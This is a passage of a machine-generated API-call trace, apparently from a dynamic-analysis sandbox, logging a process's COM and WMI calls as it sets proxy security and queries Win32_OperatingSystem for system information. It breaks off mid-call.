WbemLocator:IUnknown:QueryInterface (in: This=0x67f270, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19efcc | out: ppvObject=0x19efcc*=0x66f84c) returned 0x0 [0279.532] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x66f84c, pProxy=0x67f270, pAuthnSvc=0x19f01c, pAuthzSvc=0x19f018, pServerPrincName=0x19f010, pAuthnLevel=0x19f014, pImpLevel=0x19f004, pAuthInfo=0x19f008, pCapabilites=0x19f00c | out: pAuthnSvc=0x19f01c*=0xa, pAuthzSvc=0x19f018*=0x0, pServerPrincName=0x19f010, pAuthnLevel=0x19f014*=0x6, pImpLevel=0x19f004*=0x2, pAuthInfo=0x19f008, pCapabilites=0x19f00c*=0x1) returned 0x0 [0279.533] WbemLocator:IUnknown:Release (This=0x66f84c) returned 0x1 [0279.533] WbemLocator:IUnknown:QueryInterface (in: This=0x67f270, riid=0x6d3c10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19efc0 | out: ppvObject=0x19efc0*=0x66f870) returned 0x0 [0279.533] WbemLocator:IUnknown:QueryInterface (in: This=0x67f270, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19efbc | out: ppvObject=0x19efbc*=0x66f84c) returned 0x0 [0279.533] WbemLocator:IClientSecurity:SetBlanket (This=0x66f84c, pProxy=0x67f270, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0279.534] WbemLocator:IUnknown:Release (This=0x66f84c) returned 0x2 [0279.534] WbemLocator:IUnknown:Release (This=0x66f870) returned 0x1 [0279.534] CoTaskMemFree (pv=0x54bc3b8) [0279.534] WbemLocator:IUnknown:Release (This=0x54ba478) returned 0x0 [0279.534] WbemLocator:IUnknown:QueryInterface (in: This=0x67f270, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ebbc | out: ppvObject=0x19ebbc*=0x66f870) returned 0x0 [0279.534] WbemLocator:IUnknown:QueryInterface (in: This=0x66f870, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19eb78 | out: ppvObject=0x19eb78*=0x0) returned 0x80004002 [0279.535] WbemLocator:IUnknown:QueryInterface (in: This=0x66f870, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x0) returned 0x80004002 [0279.535] WbemLocator:IUnknown:QueryInterface (in: This=0x67f270, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e76c | out: ppvObject=0x19e76c*=0x0) returned 0x80004002 [0279.537] WbemLocator:IUnknown:AddRef (This=0x66f870) returned 0x3 [0279.537] WbemLocator:IUnknown:QueryInterface (in: This=0x66f870, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e4d4 | out: ppvObject=0x19e4d4*=0x0) returned 0x80004002 [0279.537] WbemLocator:IUnknown:QueryInterface (in: This=0x66f870, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e484 | out: ppvObject=0x19e484*=0x0) returned 0x80004002 [0279.537] WbemLocator:IUnknown:QueryInterface (in: This=0x66f870, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e490 | out: ppvObject=0x19e490*=0x66f7cc) returned 0x0 [0279.537] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x66f7cc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e498 | out: pCid=0x19e498*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.537] WbemLocator:IUnknown:Release (This=0x66f7cc) returned 0x3 [0279.537] CoGetContextToken (in: pToken=0x19e4f0 | out: pToken=0x19e4f0) returned 0x0 [0279.537] CoGetContextToken (in: pToken=0x19e8f8 | out: pToken=0x19e8f8) returned 0x0 [0279.537] WbemLocator:IUnknown:QueryInterface (in: This=0x66f870, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e988 | out: ppvObject=0x19e988*=0x66f854) returned 0x0 [0279.538] WbemLocator:IRpcOptions:Query (in: This=0x66f854, pPrx=0x66f870, dwProperty=2, pdwValue=0x19e9b0 | out: pdwValue=0x19e9b0) returned 0x80004002 [0279.538] WbemLocator:IUnknown:Release (This=0x66f854) returned 0x3 [0279.538] WbemLocator:IUnknown:Release (This=0x66f870) returned 0x2 [0279.538] CoGetContextToken (in: pToken=0x19eed0 | out: pToken=0x19eed0) returned 0x0 [0279.538] CoGetContextToken (in: pToken=0x19ee30 | out: pToken=0x19ee30) returned 0x0 [0279.538] WbemLocator:IUnknown:QueryInterface (in: This=0x66f870, riid=0x19ef00*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x19eefc | out: ppvObject=0x19eefc*=0x67f270) returned 0x0 [0279.539] WbemLocator:IUnknown:AddRef (This=0x67f270) returned 0x4 [0279.539] WbemLocator:IUnknown:Release (This=0x67f270) returned 0x3 [0279.539] WbemLocator:IUnknown:Release (This=0x67f270) returned 0x2 [0279.539] SysStringLen (param_1=0x0) returned 0x0 [0279.539] CoGetContextToken (in: pToken=0x19eec8 | out: pToken=0x19eec8) returned 0x0 [0279.539] WbemLocator:IUnknown:AddRef (This=0x66f870) returned 0x3 [0279.539] WbemLocator:IUnknown:QueryInterface (in: This=0x66f870, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed5c | out: ppvObject=0x19ed5c*=0x66f870) returned 0x0 [0279.539] WbemLocator:IUnknown:Release (This=0x66f870) returned 0x3 [0279.539] WbemLocator:IUnknown:Release (This=0x66f870) returned 0x2 [0279.539] CoGetContextToken (in: pToken=0x19efb0 | out: pToken=0x19efb0) returned 0x0 [0279.539] WbemLocator:IUnknown:AddRef (This=0x67f270) returned 0x3 [0279.539] IWbemServices:ExecQuery (in: This=0x67f270, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_OperatingSystem", lFlags=16, pCtx=0x0, ppEnum=0x19f1cc | out: ppEnum=0x19f1cc*=0x663780) returned 0x0 [0279.610] IUnknown:QueryInterface (in: This=0x663780, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f024 | out: ppvObject=0x19f024*=0x663784) returned 0x0 [0279.610] IClientSecurity:QueryBlanket (in: This=0x663784, pProxy=0x663780, pAuthnSvc=0x19f074, pAuthzSvc=0x19f070, pServerPrincName=0x19f068, pAuthnLevel=0x19f06c, pImpLevel=0x19f05c, pAuthInfo=0x19f060, pCapabilites=0x19f064 | out: pAuthnSvc=0x19f074*=0xa, pAuthzSvc=0x19f070*=0x0, pServerPrincName=0x19f068, pAuthnLevel=0x19f06c*=0x6, pImpLevel=0x19f05c*=0x2, pAuthInfo=0x19f060, pCapabilites=0x19f064*=0x1) returned 0x0 [0279.610] IUnknown:Release (This=0x663784) returned 0x1 [0279.610] IUnknown:QueryInterface (in: This=0x663780, riid=0x6d3c10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f018 | out: ppvObject=0x19f018*=0x66fc70) returned 0x0 [0279.610] IUnknown:QueryInterface (in: This=0x663780, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f014 | out: ppvObject=0x19f014*=0x663784) returned 0x0 [0279.610] IClientSecurity:SetBlanket (This=0x663784, pProxy=0x663780, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0279.612] IUnknown:Release (This=0x663784) returned 0x2 [0279.612] WbemLocator:IUnknown:Release (This=0x66fc70) returned 0x1 [0279.612] CoTaskMemFree (pv=0x54bc4d8) [0279.612] IUnknown:QueryInterface (in: This=0x663780, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ec10 | out: ppvObject=0x19ec10*=0x66fc70) returned 0x0 [0279.612] WbemLocator:IUnknown:QueryInterface (in: This=0x66fc70, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ebcc | out: ppvObject=0x19ebcc*=0x0) returned 0x80004002 [0279.613] WbemLocator:IUnknown:QueryInterface (in: This=0x66fc70, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e9ec | out: ppvObject=0x19e9ec*=0x0) returned 0x80004002 [0279.613] IUnknown:QueryInterface (in: This=0x663780, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e7c4 | out: ppvObject=0x19e7c4*=0x0) returned 0x80004002 [0279.614] WbemLocator:IUnknown:AddRef (This=0x66fc70) returned 0x3 [0279.614] WbemLocator:IUnknown:QueryInterface (in: This=0x66fc70, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e52c | out: ppvObject=0x19e52c*=0x0) returned 0x80004002 [0279.614] WbemLocator:IUnknown:QueryInterface (in: This=0x66fc70, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e4dc | out: ppvObject=0x19e4dc*=0x0) returned 0x80004002 [0279.614] WbemLocator:IUnknown:QueryInterface (in: This=0x66fc70, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e4e8 | out: ppvObject=0x19e4e8*=0x66fbcc) returned 0x0 [0279.615] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x66fbcc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e4f0 | out: pCid=0x19e4f0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.615] WbemLocator:IUnknown:Release (This=0x66fbcc) returned 0x3 [0279.615] CoGetContextToken (in: pToken=0x19e548 | out: pToken=0x19e548) returned 0x0 [0279.615] CoGetContextToken (in: pToken=0x19e950 | out: pToken=0x19e950) returned 0x0 [0279.615] WbemLocator:IUnknown:QueryInterface (in: This=0x66fc70, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e9e0 | out: ppvObject=0x19e9e0*=0x66fc54) returned 0x0 [0279.615] WbemLocator:IRpcOptions:Query (in: This=0x66fc54, pPrx=0x66fc70, dwProperty=2, pdwValue=0x19ea08 | out: pdwValue=0x19ea08) returned 0x80004002 [0279.615] WbemLocator:IUnknown:Release (This=0x66fc54) returned 0x3 [0279.615] WbemLocator:IUnknown:Release (This=0x66fc70) returned 0x2 [0279.615] CoGetContextToken (in: pToken=0x19ef20 | out: pToken=0x19ef20) returned 0x0 [0279.616] CoGetContextToken (in: pToken=0x19ee80 | out: pToken=0x19ee80) returned 0x0 [0279.616] WbemLocator:IUnknown:QueryInterface (in: This=0x66fc70, riid=0x19ef50*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x19ef4c | out: ppvObject=0x19ef4c*=0x663780) returned 0x0 [0279.616] IUnknown:AddRef (This=0x663780) returned 0x4 [0279.616] IUnknown:Release (This=0x663780) returned 0x3 [0279.616] IUnknown:Release (This=0x663780) returned 0x2 [0279.616] WbemLocator:IUnknown:Release (This=0x67f270) returned 0x2 [0279.616] SysStringLen (param_1=0x0) returned 0x0 [0279.616] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f218 | out: puCount=0x19f218*=0x2) returned 0x0 [0279.616] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f214*=0x0, pszText=0x0 | out: puBuffLength=0x19f214*=0xf, pszText=0x0) returned 0x0 [0279.616] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f214*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f214*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.616] CoGetContextToken (in: pToken=0x19f068 | out: pToken=0x19f068) returned 0x0 [0279.616] IUnknown:AddRef (This=0x663780) returned 0x3 [0279.616] IEnumWbemClassObject:Clone (in: This=0x663780, ppEnum=0x19f224 | out: ppEnum=0x19f224*=0x663910) returned 0x0 [0279.617] IUnknown:QueryInterface (in: This=0x663910, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f0e8 | out: ppvObject=0x19f0e8*=0x663914) returned 0x0 [0279.617] IClientSecurity:QueryBlanket (in: This=0x663914, pProxy=0x663910, pAuthnSvc=0x19f138, pAuthzSvc=0x19f134, pServerPrincName=0x19f12c, pAuthnLevel=0x19f130, pImpLevel=0x19f120, pAuthInfo=0x19f124, pCapabilites=0x19f128 | out: pAuthnSvc=0x19f138*=0xa, pAuthzSvc=0x19f134*=0x0, pServerPrincName=0x19f12c, pAuthnLevel=0x19f130*=0x6, pImpLevel=0x19f120*=0x2, pAuthInfo=0x19f124, pCapabilites=0x19f128*=0x1) returned 0x0 [0279.617] IUnknown:Release (This=0x663914) returned 0x1 [0279.617] IUnknown:QueryInterface (in: This=0x663910, riid=0x6d3c10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f0dc | out: ppvObject=0x19f0dc*=0x66eb70) returned 0x0 [0279.617] IUnknown:QueryInterface (in: This=0x663910, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f0d8 | out: ppvObject=0x19f0d8*=0x663914) returned 0x0 [0279.617] IClientSecurity:SetBlanket (This=0x663914, pProxy=0x663910, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0279.619] IUnknown:Release (This=0x663914) returned 0x2 [0279.619] WbemLocator:IUnknown:Release (This=0x66eb70) returned 0x1 [0279.619] CoTaskMemFree (pv=0x54bc4d8) [0279.619] IUnknown:QueryInterface (in: This=0x663910, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ecc4 | out: ppvObject=0x19ecc4*=0x66eb70) returned 0x0 [0279.620] WbemLocator:IUnknown:QueryInterface (in: This=0x66eb70, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ec80 | out: ppvObject=0x19ec80*=0x0) returned 0x80004002 [0279.620] WbemLocator:IUnknown:QueryInterface (in: This=0x66eb70, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ea9c | out: ppvObject=0x19ea9c*=0x0) returned 0x80004002 [0279.621] IUnknown:QueryInterface (in: This=0x663910, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e874 | out: ppvObject=0x19e874*=0x0) returned 0x80004002 [0279.621] WbemLocator:IUnknown:AddRef (This=0x66eb70) returned 0x3 [0279.621] WbemLocator:IUnknown:QueryInterface (in: This=0x66eb70, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e5dc | out: ppvObject=0x19e5dc*=0x0) returned 0x80004002 [0279.621] WbemLocator:IUnknown:QueryInterface (in: This=0x66eb70, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e58c | out: ppvObject=0x19e58c*=0x0) returned 0x80004002 [0279.621] WbemLocator:IUnknown:QueryInterface (in: This=0x66eb70, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e598 | out: ppvObject=0x19e598*=0x66eacc) returned 0x0 [0279.637] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x66eacc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e5a0 | out: pCid=0x19e5a0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.637] WbemLocator:IUnknown:Release (This=0x66eacc) returned 0x3 [0279.637] CoGetContextToken (in: pToken=0x19e5f8 | out: pToken=0x19e5f8) returned 0x0 [0279.637] CoGetContextToken (in: pToken=0x19ea00 | out: pToken=0x19ea00) returned 0x0 [0279.637] WbemLocator:IUnknown:QueryInterface (in: This=0x66eb70, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea90 | out: ppvObject=0x19ea90*=0x66eb54) returned 0x0 [0279.637] WbemLocator:IRpcOptions:Query (in: This=0x66eb54, pPrx=0x66eb70, dwProperty=2, pdwValue=0x19eab8 | out: pdwValue=0x19eab8) returned 0x80004002 [0279.637] WbemLocator:IUnknown:Release (This=0x66eb54) returned 0x3 [0279.637] WbemLocator:IUnknown:Release (This=0x66eb70) returned 0x2 [0279.637] CoGetContextToken (in: pToken=0x19efd8 | out: pToken=0x19efd8) returned 0x0 [0279.637] CoGetContextToken (in: pToken=0x19ef38 | out: pToken=0x19ef38) returned 0x0 [0279.637] WbemLocator:IUnknown:QueryInterface (in: This=0x66eb70, riid=0x19f008*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x19f004 | out: ppvObject=0x19f004*=0x663910) returned 0x0 [0279.637] IUnknown:AddRef (This=0x663910) returned 0x4 [0279.637] IUnknown:Release (This=0x663910) returned 0x3 [0279.638] IUnknown:Release (This=0x663910) returned 0x2 [0279.638] IUnknown:Release (This=0x663780) returned 0x2 [0279.638] SysStringLen (param_1=0x0) returned 0x0 [0279.638] IEnumWbemClassObject:Reset (This=0x663910) returned 0x0 [0279.638] CoTaskMemAlloc (cb=0x4) returned 0x54ba3d8 [0279.638] IEnumWbemClassObject:Next (in: This=0x663910, lTimeout=-1, uCount=0x1, apObjects=0x54ba3d8, puReturned=0x226d678 | out: apObjects=0x54ba3d8*=0x553aac8, puReturned=0x226d678*=0x1) returned 0x0 [0279.646] IUnknown:QueryInterface (in: This=0x553aac8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e888 | out: ppvObject=0x19e888*=0x553aac8) returned 0x0 [0279.646] IUnknown:QueryInterface (in: This=0x553aac8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e844 | out: ppvObject=0x19e844*=0x0) returned 0x80004002 [0279.646] IUnknown:QueryInterface (in: This=0x553aac8, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e664 | out: ppvObject=0x19e664*=0x0) returned 0x80004002 [0279.646] IUnknown:QueryInterface (in: This=0x553aac8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e43c | out: ppvObject=0x19e43c*=0x0) returned 0x80004002 [0279.646] IUnknown:AddRef (This=0x553aac8) returned 0x3 [0279.646] IUnknown:QueryInterface (in: This=0x553aac8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e1a4 | out: ppvObject=0x19e1a4*=0x0) returned 0x80004002 [0279.646] IUnknown:QueryInterface (in: This=0x553aac8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e154 | out: ppvObject=0x19e154*=0x0) returned 0x80004002 [0279.646] IUnknown:QueryInterface (in: This=0x553aac8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e160 | out: ppvObject=0x19e160*=0x553aacc) returned 0x0 [0279.646] IMarshal:GetUnmarshalClass (in: This=0x553aacc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e168 | out: pCid=0x19e168*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.646] IUnknown:Release (This=0x553aacc) returned 0x3 [0279.646] CoGetContextToken (in: pToken=0x19e1c0 | out: pToken=0x19e1c0) returned 0x0 [0279.646] CoGetContextToken (in: pToken=0x19e5c8 | out: pToken=0x19e5c8) returned 0x0 [0279.646] IUnknown:QueryInterface (in: This=0x553aac8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e658 | out: ppvObject=0x19e658*=0x0) returned 0x80004002 [0279.647] IUnknown:Release (This=0x553aac8) returned 0x2 [0279.647] CoGetContextToken (in: pToken=0x19eb98 | out: pToken=0x19eb98) returned 0x0 [0279.647] CoGetContextToken (in: pToken=0x19eaf8 | out: pToken=0x19eaf8) returned 0x0 [0279.647] IUnknown:QueryInterface (in: This=0x553aac8, riid=0x19ebc8*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19ebc4 | out: ppvObject=0x19ebc4*=0x553aac8) returned 0x0 [0279.647] IUnknown:AddRef (This=0x553aac8) returned 0x4 [0279.647] IUnknown:Release (This=0x553aac8) returned 0x3 [0279.647] IUnknown:Release (This=0x553aac8) returned 0x2 [0279.647] CoTaskMemFree (pv=0x54ba3d8) [0279.647] CoGetContextToken (in: pToken=0x19ef00 | out: pToken=0x19ef00) returned 0x0 [0279.647] IUnknown:AddRef (This=0x553aac8) returned 0x3 [0279.647] IWbemClassObject:Get (in: This=0x553aac8, wszName="__GENUS", lFlags=0, 